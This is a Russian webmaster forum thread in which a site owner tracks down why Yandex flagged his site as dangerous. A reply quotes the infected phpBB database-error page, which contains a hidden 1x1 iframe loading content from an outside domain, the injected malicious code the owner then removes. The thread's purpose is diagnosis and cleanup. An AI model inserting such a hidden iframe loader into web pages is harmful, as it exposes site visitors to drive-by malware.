Как найти опасный код на странице

Vergiliy
На сайте с 30.05.2006
Offline
185
720

Здравствуйте.

Яндекс пометил сайт #### как "Этот сайт может угрожать безопасности вашего компьютера".

Значится вирус Troj/Fujif-Gen.

Вы не подскажите как исправить ситуацию? Какой код является вредоносным?

На сайте ничего не менялось, разве что могли украсть FTP пароль!

T
На сайте с 12.09.2011
Offline
55
#1

Может быть вот это поможет:

/ru/forum/641507

r12u
На сайте с 13.06.2009
Offline
37
#2

Пробовали платону писать?

Проверил сканером сайт, все нормально.

http://online.us.drweb.com/?url=1

http://antivirus-alarm.ru

uaman
На сайте с 22.09.2011
Offline
13
#3

Проверьте код ваших страничек на тег <iframe>. Если могли украсть ФТП, то могут гнать трафик вашего сайта в загрузки.

V
На сайте с 27.04.2009
Offline
46
#4

Скиньте исходный HTML страницы с трояном посмотреть.

Мое детище, которое холю и лелею (http://quicktuts.ru/) Беспроводной интернет, антенны Yota (http://skylink.ws/Yota/) Профессиональный хостинг. Бесплатный домен. Безлимитный трафик. (http://goo.gl/MMvWNj)
Vergiliy
На сайте с 30.05.2006
Offline
185
#5

Спасибо за ответы.

Действительно проверки сайта он-лайн антивирусами показывают только "Вирусов НЕ найдено".

Проверил все файлы на наличие "левого" javascript и iframe - все чисто. Так же просмотреть дату изменения файлов, все котируются 2010 годом.

В службу поддержки Яндекса написал, об ответе отпишусь. Так же направил сайт через вебмастер на перепроверку. На всякий случай, все FTP пароли заменил.

Vergiliy добавил 16.10.2011 в 18:07

vaggah:
Скиньте исходный HTML страницы с трояном посмотреть.

Исходник вы можете посмотреть по одной из ссылок указанных в первом посте. Уверяю, ничего вашему компьютеру не будет.

seosniks
На сайте с 13.08.2007
Offline
389
#6

Тс во ссылке

вот код

<html>

<body>

phpBB : <b>Critical Error</b>

<br /><br />

Could not connect to the database

 iframe src='http://ntkrnlpa.info/cr/?i=' width=1 height=1></iframe 

</body>

</html>

Vergiliy
На сайте с 30.05.2006
Offline
185
#7

Все спасибо, особенно seosniks.

Вредоносный код нашел и удалил.

Кому интересно причина была в следующем:

из-за того что на хостинге закончилось свободное место, с утра перестал реагировать на запросы mysql (выдавал “Не возможно подключиться в БД”). А на этой странице с ошибкой и оказался iframe, который я просмотрел, когда удалял вирус года два назад. Поэтому и дата изменения файла значилась 2010 годом (т.к. по сути файл никто и того времени и не менял) и он-лайн проверка ничего не дала (т.к. на момент проверки сайт я уже починил и вместо страницы с ошибкой начала отображаться нормальная страница сайта, на которой вредоносного кода никогда и не было). А когда изменил пароль на ftp, поменялся и пароль на БД и меня опять начало кидать на страницу с ошибкой (см. посмотом выше). Вот тут-то вредоносный код и нашелся.

Все спасибо. Тему можно закрывать. Чтобы больше не палить сайт, ссылку с первого поста я убрал.

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий